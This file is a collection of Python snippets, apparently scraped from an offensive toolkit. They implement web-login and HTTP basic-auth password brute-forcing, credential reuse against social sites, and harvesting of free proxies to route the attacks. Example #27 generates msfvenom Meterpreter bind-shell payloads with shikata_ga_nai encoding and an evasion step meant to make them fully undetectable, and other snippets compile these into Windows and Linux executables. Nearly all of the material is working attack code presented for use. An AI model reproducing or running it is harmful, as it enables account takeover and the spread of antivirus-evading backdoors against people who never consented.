Example #1
0
def submit(options, loginInfo, creds, result):
    tryPassword, tryUsername = creds
    realm = loginInfo[0]
    for cred in list(result.queue):
        if tryUsername == cred[0]:
            return True  # don't run if find password of username

    if options.verbose:
        printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm')

    try:
        proc = startBrowser(options.timeout)
        proc.add_password(options.url, tryUsername, tryPassword, realm)
        proc.open(options.url)
        try:
            proc.open(options.url)
            # printf("[*] Page title: ['%s']" %(proc.title()), "good")
            printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()),
                   "good")
            result.put([options.url, tryUsername, tryPassword])
            # printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good")
        except Exception as err:
            try:
                if err.code == 401:
                    if options.verbose:
                        printf("[-] Failed %s" % (creds[::-1]), "bad")
                else:
                    printf("[x] %s: %s" % (err, creds[::-1]), "bad")
            except:
                die("[x] HTTP GET:", err)
    except:
        if options.verbose:
            printf("[x] Failed!", "bad")
Example #2
0
def checkAllProxy(proxyList, target):
    try:
        for proxyAddr in proxyList:
            proxyAddr = proxyAddr.replace("\n", "")

            result = connProxy(proxyAddr, target)
            if result:
                #livelist.append(result)
                actions.fwrite_c(TMP_PATH,
                                 "%s\n" % (proxyAddr))  #TODO use queu here

    except Exception as error:
        utils.printf(error, "bad")
Example #3
0
def submit(URL, tryUsername, tryPassword, proxy, verbose, result):

    for cred in list(result.queue):
        if tryUsername == cred[0]:
            return 0  # don't run if find password of username

    if verbose:
        utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')

    try:

        resp = requests.get(URL, auth=HTTPBasicAuth(tryUsername, tryPassword))

        if resp.status_code == 200:
            result.put([tryUsername, tryPassword])
            utils.printf("[*] Match found: %s:%s" % (tryUsername, tryPassword),
                         "good")
            # pass
        elif resp.status_code == 401:
            if verbose:
                utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
                             "bad")
        else:
            # unknown
            pass
    except Exception as err:
        utils.printf(
            "[x] Error: %s:%s\n%s at %s" %
            (tryUsername, tryPassword, error, URL), "bad")
Example #4
0
def submit(optionURL, tryCreds, optionProxy, optionVerbose, result):

    try:
        proc = tbrowser.startBrowser()
        proc.addheaders = [('User-Agent', tbrowser.useragent())]

        utils.printf("[+] Checking %s" % (optionURL))

        proc.open(optionURL)
        loginInfo = tbrowser.parseLoginForm(proc.forms())

    except Exception as err:
        if optionVerbose:
            utils.printf("[x] ReAuth: %s at %s" % (err, optionURL), "bad")

    if not loginInfo:
        if optionVerbose:
            utils.printf(
                "[x] ReAuth: Can't find login form at %s" % (optionURL), "bad")
    else:
        try:
            loginbrute.submit(
                optionURL,
                tryCreds[::-1],
                optionProxy,  # Reverse username + password. Dynamic submit in loginbrute
                "",
                optionVerbose,
                loginInfo,
                result,
                True  # No key false by default, result now should be url
            )
        except Exception as err:
            if optionVerbose:
                utils.printf("[x] ReAuth: Submitting error for %s" % (err),
                             "bad")
Example #5
0
    def checProxyConnProvider(url="https://free-proxy-list.net/"):
        try:
            printf("[+] Getting proxy list from %s" % (url))

            getproxy = startBrowser(options.timeout)

            getproxy.open(url)
            printf("[*] Gathering proxies completed.", "good")
            return getproxy.response().read()

        except Exception as error:
            die("[x] GetProxy: Error while connecting to proxy server!", error)
        finally:
            getproxy.close()
Example #6
0
def submit(url, options, tryCreds, result):

	try:
		proc = startBrowser(options.timeout)

		printf("[+] Checking %s" %(url))

		proc.open(url)
		loginInfo = parseLoginForm(proc.forms())

	except Exception as err:
		if options.verbose:
			printf("[x] ReAuth: %s at %s" %(err, url), "bad")
		

	if not loginInfo:
		if options.verbose:
			printf("[x] ReAuth: Can't find login form at %s" %(url), "bad")
	else:
		try:
			options.url = url

			loginbrute.submit(
				# Reverse username + password. Dynamic submit in loginbrute
				options, loginInfo, tryCreds[-2:][::-1], result
			)
		except Exception as err:
			if options.verbose:
				printf("[x] ReAuth: Submitting error for %s" %(err), "bad")
Example #7
0
	def run(self):
		try:
			data = actions.getout(self.source)
			data = actions.evade(self.platform, self.evasion_tech, self.evasion_method, data, self.output_name)
		# Get new data, start writing to output file
			if self.destination[-1] != '/':
				self.destination += '/'
			output_payload = self.destination + 'output.c'

			actions.writeout(data, output_payload)
			# Write done!, start building exe file
			actions.build_exec(self.platform, self.architecture, output_payload, self.destination, self.output_name)
		except:
			utils.printf("Error while running module", 'bad')
Example #8
0
def refresh():
    try:
        listproxy = parse_proxy(get_proxy_list())
    except:
        listproxy = ""
    finally:
        try:
            listproxy = "\n".join(listproxy)
            utils.printf("Write data to %s." % (PROXY_PATH))
            actions.fwrite(PROXY_PATH, listproxy)
            utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")

        except Exception as error:
            utils.die("Error while writting proxy data", error)
Example #9
0
def run(options, creds):
	social_urls = data.social_urls().replace("\t", "").split("\n")

	for url in social_urls:
		if options.url in url:
			social_urls.remove(url)


	result = Queue()
	#workers = []

	try:
		for tryCreds in creds:
			for url in social_urls:
				submit(url, options, tryCreds, result)

				# if len(workers) == options.threads:
				# 	do_job(workers)
				# 	del workers[:]

				# worker = threading.Thread(
				# 	target = submit,
				# 	args = (url, options, tryCreds, result)
				# )

				#worker.daemon = True
				#workers.append(worker)

		#do_job(workers)
		#del workers[:]
		
	
	except KeyboardInterrupt:
		printf("[x] Terminated by user!", "bad")
		import os
		os._exit(0)

	except SystemExit:
		die("[x] Terminated by system!", "SystemExit")
	
	except Exception as err:
		die("[x] ReAuth: Runtime error", err)
				
	finally:
		result = list(result.queue)

		if len(result) == 0:
			printf("[-] No extra valid password found", "bad")
		else:
			print_table(("Target", "Username", "Password"), *result)
Example #10
0
    def get_options(self):
        szOptions = len(sys.argv)

        if szOptions == 1:
            # NO ARGUMENT
            print_fast_help()

            printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS))
            sys.exit(0)

        else:
            try:
                self.parse_options(szOptions)
            except Exception as error:
                die("[x] Options: Parse options error", error)
Example #11
0
def checkOption(options, run_options):

    finalOption = {}
    global MODE, DEF_WORDLIST
    # Modify URL value to correct format
    # Read password list
    # Read userlist
    # Convert to int(threads)

    try:
        finalOption["threads"] = int(options["-t"])
        if finalOption["threads"] < 1:
            utils.die("Argument error", "Threads must be > 1")
    except Exception as ConvertError:
        utils.die("Invalid threads", ConvertError)

    if MODE == "--sqli":
        finalOption["passlist"] = "MyP@ssW0rd"
        finalOption["userlist"] = data.getSQL()

    else:
        # WARNING eval() is called. It can be unsafe
        finalOption["passlist"] = eval(
            "data.%s_pass()" % (options["-p"])).replace(
                "\t", "") if options["-p"] in DEF_WORDLIST else actions.fread(
                    options["-p"])

        if options["-U"]:
            finalOption["userlist"] = actions.lread(options["-U"])

        else:
            finalOption["userlist"] = eval(
                "data.%s_user()" % (options["-u"])).replace(
                    "\t",
                    "") if options["-u"] in DEF_WORDLIST else actions.fread(
                        options["-u"])

    finalOption["falsekey"] = options["-k"]

    if run_options["--proxy"]:
        try:
            import data
            run_options["--proxy"] = actions.fread(
                "%s/liveproxy.txt" % (data.__path__[0])).split("\n")
        except Exception as err:
            utils.printf("Argument error", err)

    return finalOption, run_options
Example #12
0
def check_login(opts):
    try:
        proc = startBrowser(options.timeout)

        proc.open(opts.url)
        """
			Check URL type. If Website directs to other URL,
			options.url is website's panel
			else: it is login url.
			Example: options.url = site.com/wp-admin/ -> panel
				site directs user to wp-login -> login URL
				options.url = site.com/wp-login.php -> login URL
		"""
        if proc.geturl() != opts.url:
            printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
            opts.panel_url, opts.login_url = opts.url, proc.geturl()
        else:
            opts.login_url = opts.url

        # printf("[*] Connect success!", "good")
        options.attack_mode = "--loginbrute"
        if opts.run_options["--verbose"]:
            printf("[*] %s" % (proc.title()), "norm")
        # printf("[+] Analyzing login form....")
        loginInfo = parseLoginForm(proc.forms())
        return loginInfo

    except Exception as error:
        try:
            if error.code == 401:
                ## GET INFORMATION
                resp_header = str(proc.response().info())
                if "WWW-Authenticate" in resp_header:
                    loginID = checkHTTPGetLogin(resp_header)
                    loginInfo = (loginID, ["Password", "User Name"])
                    if options.verbose:
                        printf("[+] Using HTTP GET Authentication mode",
                               "norm")
                    options.attack_mode = "--httpget"
                else:
                    loginInfo = False
            else:
                loginInfo = False
                printf("[x] Target check: %s" % (error), "bad")

        # Error != http code
        except:
            loginInfo = False
            die("[x] Target check:", error)

    except KeyboardInterrupt:
        loginInfo = False

    finally:
        proc.close()
        return loginInfo
Example #13
0
    def checProxyConnProvider(url="https://free-proxy-list.net/"):
        try:
            utils.printf("Connecting to %s." % (url))

            getproxy = tbrowser.startBrowser()

            user_agent = tbrowser.useragent()

            getproxy.addheaders = [('User-Agent', user_agent)]
            getproxy.open(url)
            utils.printf("Gathering proxies completed.", "good")
            return getproxy.response().read()

        except Exception as error:
            utils.die("GetProxy: Error while connecting to proxy server!",
                      error)
        finally:
            getproxy.close()
Example #14
0
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose):
    social_urls = data.social_urls().replace("\t", "").split("\n")

    for url in social_urls:
        # BUG double_free()
        if checkedURL in url:
            social_urls.remove(url)

    result = Queue()
    workers = []

    try:
        for tryCreds in creds:
            for url in social_urls:
                if actions.size_o(workers) == optionThreads:
                    do_job(workers)
                    del workers[:]

                worker = threading.Thread(target=submit,
                                          args=(url, tryCreds, optionProxy,
                                                optionVerbose, result))

                worker.daemon = True
                workers.append(worker)

        do_job(workers)
        del workers[:]

    except KeyboardInterrupt:
        utils.die("[x] Terminated by user!", "KeyboardInterrupt")

    except SystemExit:
        utils.die("[x] Terminated by system!", "SystemExit")

    except Exception as err:
        utils.die("[x] ReAuth: Runtime error", err)

    finally:
        result = list(result.queue)

        if actions.size_o(result) == 0:
            utils.printf("[-] No extra valid password found", "bad")
        else:
            utils.print_table(("Target", "Username", "Password"), *result)
Example #15
0
def get_proxy_list(url="https://free-proxy-list.net/"):
    try:
        utils.printf("Connecting to %s." % (url))
        # getproxy = mechanize.Browser()
        # getproxy.set_handle_robots(False)

        getproxy = tbrowser.startBrowser()

        user_agent = tbrowser.useragent()

        getproxy.addheaders = [('User-Agent', user_agent)]
        getproxy.open(url)
        utils.printf("Gathering proxy completed.", "good")
        return getproxy.response().read()

    except Exception as error:
        utils.die("Error while connecting to live proxy server!", error)
    finally:
        getproxy.close()
Example #16
0
def getNewProxy(PROXY_PATH):
    def parse_proxy(response):
        try:
            re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
            result = re.findall(re_ip, response, re.MULTILINE)
            result = [element.replace("</td><td>", ":") for element in result]
            return result
        except Exception as error:
            utils.die("GetProxy: Error while parsing proxies.", error)

    def checProxyConnProvider(url="https://free-proxy-list.net/"):
        try:
            utils.printf("Connecting to %s." % (url))

            getproxy = tbrowser.startBrowser()

            user_agent = tbrowser.useragent()

            getproxy.addheaders = [('User-Agent', user_agent)]
            getproxy.open(url)
            utils.printf("Gathering proxies completed.", "good")
            return getproxy.response().read()

        except Exception as error:
            utils.die("GetProxy: Error while connecting to proxy server!",
                      error)
        finally:
            getproxy.close()

    try:
        listproxy = parse_proxy(checProxyConnProvider())
    except:
        listproxy = ""
    finally:
        try:
            listproxy = "\n".join(listproxy)
            utils.printf("Write data to %s." % (PROXY_PATH))
            actions.fwrite(PROXY_PATH, listproxy)
            utils.printf("Write data to %s completed!" % (PROXY_PATH), "good")

        except Exception as error:
            utils.die("GetProxy: Error while writting data", error)
Example #17
0
def build_exec(platform, architecture, srcPath, destPath, outname):
    if platform == 'windows':
        destPath += '{}.exe'.format(outname)
    else:
        destPath += outname
    build_cmd = {
        'windows': {
            'x86':
            'i686-w64-mingw32-gcc {} -o {} -mwindows'.format(
                srcPath, destPath),
            'x64':
            'x86_x64-w64-mingw32-gcc {} -o {} -mwindows'.format(
                srcPath, destPath)
        },
        'linux': {
            'x86': 'gcc {} -o {} -m32 -static'.format(srcPath, destPath),
            'x64': 'gcc {} -o {} -static'.format(srcPath, destPath)
        }
        #		['android', 'davik', 'command']
    }
    utils.printf("Generating build command", 'warn')
    try:
        build_cmd = build_cmd[platform][architecture]
        os.popen(build_cmd)
        utils.printf("Build completed at {}".format(destPath), 'good')
    except:
        utils.printf("Wrong building command. Check your options", 'bad')
Example #18
0
def getLoginForm(optionURL, browser, verbose):
    ######################################
    #	Test connect to URL
    #	Fetch login field
    #
    #####################################

    try:

        browser.open(optionURL)

        formLoginID, formUserfield, formPasswdfield = parseLoginForm(
            browser.forms())
        if verbose:
            utils.printf("Found login form", "good")
        return formLoginID, formUserfield, formPasswdfield

    except TypeError as error:
        utils.die("Can not find login form", error)

    except Exception as error:
        utils.die("Checking connection error", error)
Example #19
0
def writeout(data, path):
    utils.printf("Trying to write new data", 'warn')
    try:
        writeData = open(path, 'w')
        writeData.write(data)
        writeData.close()
        utils.printf("Data has been written", 'good')
    except:
        utils.printf("Error while writing data at {}".format(path), 'bad')
Example #20
0
def getout(path):
    utils.printf("Loading file", 'warn')
    try:
        getData = open(path, 'r')
        data = getData.read()
        getData.close()
        utils.printf("Loading data completed", 'good')
        return data
    except:
        utils.printf("Can not read file at {}".format(path), 'bad')
Example #21
0
def submit(URL, tryUsername, tryPassword, proxy, verbose, result):
	if verbose:
		utils.printf("Trying: %s:%s" %(tryUsername, tryPassword), 'norm')
	
	try:

		resp = requests.get(URL, auth = HTTPBasicAuth(tryUsername, tryPassword))
		
		if resp.status_code == 200:
			result.put([tryUsername, tryPassword])
			utils.printf("[*] Match found: %s:%s" %(tryUsername, tryPassword), "good") 
			# pass
		elif resp.status_code == 401:
			if verbose:
				utils.printf("[-] Failed: %s:%s" %(tryUsername, tryPassword), "bad")
		else:
			# unknown
			pass
	except Exception as err:
		utils.printf("[x] Error: %s:%s\n%s" %(tryUsername, tryPassword, error), "bad")
Example #22
0
def connProxy(proxyAddr, target):
    try:
        proxyTest = tbrowser.startBrowser()
        user_agent = tbrowser.useragent()
        proxyTest.addheaders = [('User-Agent', user_agent)]
        utils.printf(proxyAddr)
        proxyTest.set_proxies({"http": proxyAddr})
        proxyTest.open(target)
        utils.printf(proxyAddr, "good")
        return proxyAddr
    except Exception as error:
        utils.printf("%s %s" % (proxyAddr, error), "bad")
        return None
    finally:
        try:
            proxyTest.close()
        except:
            pass
Example #23
0
def getnew(options):
    def parse_proxy(response):
        try:
            re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}"
            result = re.findall(re_ip, response, re.MULTILINE)
            result = [element.replace("</td><td>", ":") for element in result]
            return result
        except Exception as error:
            die("[x] GetProxy: Error while parsing proxies.", error)

    def checProxyConnProvider(url="https://free-proxy-list.net/"):
        try:
            printf("[+] Getting proxy list from %s" % (url))

            getproxy = startBrowser(options.timeout)

            getproxy.open(url)
            printf("[*] Gathering proxies completed.", "good")
            return getproxy.response().read()

        except Exception as error:
            die("[x] GetProxy: Error while connecting to proxy server!", error)
        finally:
            getproxy.close()

    try:
        listproxy = parse_proxy(checProxyConnProvider())
    except:
        listproxy = ""
    finally:
        try:
            listproxy = "\n".join(listproxy)
            printf("[*] Get %s proxies." % (len(listproxy)), "good")
            printf("[+] Saving to %s" % (PROXY_PATH))
            fwrite(PROXY_PATH, listproxy)
            printf("[*] Data saved!", "good")

        except Exception as error:
            die("[x] GetProxy: Error while writting data", error)
Example #24
0
    def checProxyConn(proxyAddr, target, result, verbose):
        try:
            proxyTest = startBrowser(options.timeout)
            proxyTest.set_proxies({"http": proxyAddr})

            if verbose:
                printf("[+] Trying: %s" % (proxyAddr))

            proxyTest.open(options.url)

            if verbose:
                printf("[*] Success: %s" % (proxyAddr), "good")
            result.put(proxyAddr)

        except Exception as error:
            if verbose:
                printf("[x] %s %s" % (proxyAddr, error), "bad")
        finally:
            try:
                proxyTest.close()
            except:
                pass
Example #25
0
    def checProxyConn(proxyAddr, target, result, verbose):
        try:
            proxyTest = tbrowser.startBrowser()
            user_agent = tbrowser.useragent()
            proxyTest.addheaders = [('User-Agent', user_agent)]
            proxyTest.set_proxies({"http": proxyAddr})

            if verbose:
                utils.printf("Trying: %s" % (proxyAddr))

            proxyTest.open(target)

            if verbose:
                utils.printf("Success: %s" % (proxyAddr), "good")
            result.put(proxyAddr)

        except Exception as error:
            if verbose:
                utils.printf("%s %s" % (proxyAddr, error), "bad")
        finally:
            try:
                proxyTest.close()
            except:
                pass
Example #26
0
def submit(optionURL, tryCred, setProxyList, setKeyFalse, optionVerbose,
           loginInfo, result, optionReauth):

    #	Get login form field informations

    # BUG parse form issue with gmail, move to tbrowser.parseLoginForm
    frmLoginID, frmFields = loginInfo
    tryPassword, tryUsername = tryCred

    proc = tbrowser.startBrowser()

    user_agent = tbrowser.useragent()
    proc.addheaders = [('User-Agent', user_agent)]

    for cred in list(result.queue):
        if tryUsername == cred[0]:
            return 0  # don't run if find password of username

    if setProxyList:
        #Set proxy connect
        proxyAddr = actions.randomFromList(setProxyList)
        proc.set_proxies({"http": proxyAddr})

    try:

        proc.open(optionURL)

        #	Select login form

        proc.select_form(nr=frmLoginID)

        # FILLS ALL FIELDS https://stackoverflow.com/a/5389578

        for field, cred in zip(frmFields, tryCred):
            proc.form[field] = cred

        #	Send request
        proc.submit()

        if optionVerbose:
            utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
            if setProxyList:
                utils.printf("Using proxy: %s" % (proxyAddr), 'norm')

        #	Reload - useful for redirect to dashboard
        proc.reload()
        #	If no login form -> success
        #	TODO improve condition to use captcha

        if not tbrowser.parseLoginForm(proc.forms()):

            if setKeyFalse:
                if setKeyFalse not in proc.response().read():

                    # Add creds to success list
                    # If verbose: print
                    if tryUsername:
                        utils.printf(
                            "[*] Match found: %s:%s" %
                            (tryUsername, tryPassword), "good")
                        #result.put([tryUsername, tryPassword])
                    else:
                        utils.printf("[*] Password found: %s" % (tryPassword),
                                     "good")
                        #result.put([tryPassword])
                    if not optionReauth:
                        result.put([tryUsername, tryPassword])
                    else:
                        result.put([
                            optionURL.split("/")[2], tryUsername, tryPassword
                        ])

                    #	Clear object and try new username

                else:
                    if optionVerbose:
                        utils.printf(
                            "[-] Failed: %s:%s" % (tryUsername, tryPassword),
                            "bad")

            else:
                if tryUsername:
                    utils.printf(
                        "[*] Match found: %s:%s" % (tryUsername, tryPassword),
                        "good")
                    #result.put([tryUsername, tryPassword])
                else:
                    utils.printf("[*] Password found: %s" % (tryPassword),
                                 "good")
                    #result.put([tryPassword])
                if not optionReauth:
                    result.put([tryUsername, tryPassword])
                else:
                    result.put(
                        [optionURL.split("/")[2], tryUsername, tryPassword])

                #	Clear object and try new username
        else:
            if optionVerbose:
                utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
                             "bad")

    except mechanize.HTTPError as error:
        #	Get blocked
        if optionVerbose:
            utils.printf(
                "[x] Error: %s:%s\n%s at %s" %
                (tryUsername, tryPassword, error, optionURL), "bad")
        return False

    except Exception as error:
        if optionVerbose:
            utils.printf(
                "[x] Error: %s:%s\n%s at %s" %
                (tryUsername, tryPassword, error, optionURL), "bad")
        return False

    finally:
        proc.close()
    return True
Example #27
0
 def run(self):
     try:
         utils.printf("Generating options", 'warn')
         generate = {
             'windows': {
                 'x86':
                 'msfvenom -p windows/meterpreter/bind_tcp -a {} '.format(
                     self.architecture),
                 'x64':
                 'msfvenom -p windows/x64/meterpreter/bind_tcp -a {} '.
                 format(self.architecture)
             },
             'linux': {
                 'x86': 'msfvenom -p linux/x86/meterpreter/bind_tcp -a x86',
                 'x64': 'msfvenom -p linux/x64/meterpreter/bind_tcp -a x64'
             }
         }
         randiter = str(random.randint(7, 18))
         generate = generate[self.platform][
             self.architecture] + 'lport={} '.format(self.lport)
         generate += '--smallest -e x86/shikata_ga_nai -f c -b "\\x00\\x0a\\x0d" -i {} '.format(
             randiter)
         src_output = 'output/meterpreter_bind.c'
         generate += '-o {} --platform {}'.format(src_output, self.platform)
         utils.printf("Generating payload", 'warn')
         os.popen(generate)
         utils.printf("Output source generated at {}".format(src_output),
                      'good')
     except:
         utils.printf("Error while generating payload", 'bad')
         return ''
     utils.printf("Generating FUD payload", 'warn')
     try:
         data = actions.getout(src_output)
         data = actions.evade(self.platform, self.evasion_tech,
                              self.evasion_method, data, self.output_name)
         actions.writeout(data, src_output)
         utils.printf("Generating FUD completed", 'good')
     except:
         utils.printf("Error while generating FUD payload", 'bad')
         return ''
     utils.printf("Building executable file", 'warn')
     actions.build_exec(self.platform, self.architecture, src_output,
                        'output/', self.output_name)
     utils.printf("Build completed", 'good')
Example #28
0
def submit(options, loginInfo, tryCred, result):

	#	Get login form field informations
	
	# frmLoginID, frmFields = loginInfo
	tryPassword, tryUsername = tryCred

	proc = startBrowser()
	
	for cred in list(result.queue):
		if tryUsername == cred[1]:
			return True
	
	if options.proxy:
		# Set proxy connect
		proxyAddr = randomFromList(options.proxy)
		proc.set_proxies({"http": proxyAddr})
	
	try:
		proc.open(options.login_url)
		_form = parseLoginForm(proc.forms())
		if not _form:
			if options.verbose:
				printf("[x] LoginBrute: No login form found. Possibly get blocked!")
			return False
		else:
			frmLoginID, frmFields = _form
			frmUsername, _ = frmFields
		if options.verbose and loginInfo != _form:
			printf("[+] Warning: Form field has been changed!")

		#	Select login form
		proc.select_form(nr = frmLoginID)
		
		# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
		proc.form[frmUsername] = tryUsername
		proc.submit()
		_, _, frmPasswd = parseLoginForm(proc.forms())
		proc.form[frmPasswd] = tryPassword
		proc.submit()
		# page_title = proc.title()
		#	Send request

		if options.verbose:
			if options.proxy:
				printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm')
			else:
				printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm')
		
		#	Reload the browser. For javascript redirection and others...
		# proc.reload()
		#	If no login form -> maybe success. Check conditions
		
		if not parseLoginForm(proc.forms()):# != loginInfo:
			test_result = check_condition(options, proc, loginInfo)
			
			if test_result == 1:
				printf("[*] Page title: ['%s']" %(proc.title()), "good")
				# "If we tried login form with username+password field"
				if tryUsername:
					printf("[*] Found: %s" %([tryUsername, tryPassword]), "good")
				# "Else If we tried login form with password field only"
				else:
					printf("[*] Found: %s" %([tryPassword]), "good")
				result.put([options.url, tryUsername, tryPassword])
			elif test_result == 2 and options.verbose:
				printf("[+] SQL Injection vulnerable found")
				printf("   %s" %([tryUsername, tryPassword]), "norm")
			else:
				# Possibly Error. But sometime it is true
				if options.verbose:
					printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad")
					printf("   [x] Page title: ['%s']" %(proc.title()), "bad")
		
		# "Login form is still there. Oops"
		else:
			# TODO test if web has similar text (static)
			if sqlerror(proc.response().read()) and options.verbose:
				printf("[+] SQL Injection vulnerable found")
				printf("   %s" %([tryUsername, tryPassword]), "norm")
			if options.verbose:
				if options.proxy:
					printf(
						"[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr),
						"bad"
					)
				else:
					printf(
						"[-] Failed: %s" %([tryUsername, tryPassword]),
						"bad"
					)
		return True

	except Exception as error:
		"""
			Sometimes, web servers return error code because of bad configurations,
			but our cred is true.
			This code block showing information, for special cases
		"""		

		try:
			# Unauthenticated
			if error.code == 401:
				if options.verbose:
					printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
			# Server misconfiguration? Panel URL is deleted or wrong
			elif error.code == 404:
				printf("[x] %s: %s" %(error, tryCred[::-1]), "bad")
				if options.verbose:
					printf("   %s" %(proc.url()), "bad")
			# Other error code
			else:
				if options.verbose:
					printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad")
		except:
			# THIS BLOCKED BY WAF
			printf("[x] Loginbrute: %s" %(error), "bad")
		return False

	finally:
		proc.close()
Example #29
0
def getUserOptions():

    global URL, MODE, r_options, DEF_WORDLIST

    # Default operation modes:
    #	--brute: brute force
    #	--sqli: sql injection bypass login (TODO)
    #	--httpauth: http basic authentication

    DEF_R_MODE = ("--brute", "--sqli", "--httpauth")

    # Default running mode:
    #	--verbose: display informations
    #	--report: create task report
    #	--proxy: Running using proxy

    # Default options:
    #	-u: Read userlist from file
    #	-p: Read passlit from file
    #	-U: Read username / userlist directly from argument
    #	-t: Number of threads using
    #	-k: Set key for false condition (for special cases)

    # Default wordlist: default, router, unix, tomcat, cctv, mirai, http

    options = {
        "-u": "default",
        "-p": "default",
        "-t": 16,
        "-k": None,
        "-U": None,
    }

    GETPROXY = False

    ########### STARTING ##################

    if len(sys.argv) == 1:
        utils.print_help()
        sys.exit(0)

    idx = 1
    while idx < len(sys.argv):
        if sys.argv[idx] in ("-h", "--help", "help"):
            utils.print_help()
            sys.exit(0)

        else:
            if sys.argv[idx][:2] == "--":
                if sys.argv[idx] in r_options.keys():
                    # --verbose", "--report", "--proxy"
                    r_options[sys.argv[idx]] = True

                elif sys.argv[idx] in DEF_R_MODE:
                    # "--brute", "--sqli", "--httpauth"
                    MODE = sys.argv[idx]

                elif sys.argv[idx] == "--list":
                    # Wordlist provided
                    if sys.argv[idx + 1] in DEF_WORDLIST:
                        options["-u"], options["-p"], idx = sys.argv[
                            idx + 1], sys.argv[idx + 1], idx + 1
                    else:
                        utils.die("Error while parsing arguments",
                                  "Invalid wordlist %s" % (sys.argv[idx + 1]))

                elif sys.argv[idx] == "--getproxy":
                    GETPROXY = True

                else:
                    utils.die("Error while parsing arguments",
                              "Invalid option %s" % (sys.argv[idx]))

            elif sys.argv[idx][:1] == "-":
                if sys.argv[idx] in options.keys():
                    # "-u", "-U", "-p", "-t", "-k"
                    options[sys.argv[idx]], idx = sys.argv[idx + 1], idx + 1
                else:
                    utils.die("Error while parsing arguments",
                              "Invalid option %s" % (sys.argv[idx]))

            else:
                URL = sys.argv[idx]

        idx += 1

    URL = checkURL(URL)

    if GETPROXY:
        # TODO Auto brute using proxy after get new proxy
        # TODO New help banner

        from extras import getproxy

        try:
            threads = int(options["-t"])
        except Exception as err:
            utils.die("GetProxy: Error while parsing arguments", err)

        getproxy.main(URL, threads, r_options["--verbose"])

        # GET NEW PROXY LIST ONLY
        if not URL:
            sys.exit(0)
        # else: CHECK PROXY TO TARGET DONE, AUTO ATTACK?
        # 	r_options["--proxy"] == True

    if not URL:
        utils.die("Error while parsing arguments", "Invalid URL")
    utils.printf(utils.start_banner(URL, options, MODE, r_options), "good")
    options, r_options = checkOption(options, r_options)

    return URL, options, MODE, r_options
Example #30
0
def getUserOptions():

    global URL, USERLIST, PASSLIST, THREADS, KEY_FALSE, MODE, r_options

    # Default operation modes:
    #	--brute: brute force
    #	--sqli: sql injection bypass login (TODO)
    #	--basic: http basic authentication (TODO)

    DEF_A_MODE = ("--brute", "--sqli", "--basic")

    # Default running mode:
    #	--verbose: display informations (TODO)
    #	--log: creating log file (TODO)
    #	--proxy: Running using proxy

    DEF_R_MODE = ("--verbose", "--log", "--proxy")

    # Default options:
    #	-u: Read userlist from file
    #	-p: Read passlit from file
    #	-U: Read username / userlist directly from argument
    #	-t: Number of threads using #TODO Modify for new module
    #	-k: Set key for false condition (for special cases)

    DEF_OPS = ("-u", "-U", "-p", "-t", "-k")

    options = {
        "-u": USERLIST,
        "-p": PASSLIST,
        "-t": THREADS,
        "-k": KEY_FALSE,
        "-U": None,
    }

    if len(sys.argv) == 1:
        utils.print_help()
        sys.exit(0)

    idx = 1
    while idx < len(sys.argv):
        if sys.argv[idx] in ("-h", "--help", "help"):
            utils.print_help()

        else:
            if sys.argv[idx] in DEF_R_MODE:
                r_options[sys.argv[idx]] = True

            elif sys.argv[idx] in DEF_A_MODE:
                MODE = sys.argv[idx]
                idx += 1

            elif sys.argv[idx] in DEF_OPS:
                options[sys.argv[idx]] = sys.argv[idx + 1]
                idx += 1

            else:
                URL = sys.argv[idx]

        idx += 1

    if not URL:
        utils.printf("An URL is required", "bad")
        sys.exit(1)
    else:
        utils.printf(craftbanner(URL, options, MODE, r_options), "good")
        URL, options, r_options = checkOption(URL, options, r_options)

        return URL, options, MODE, r_options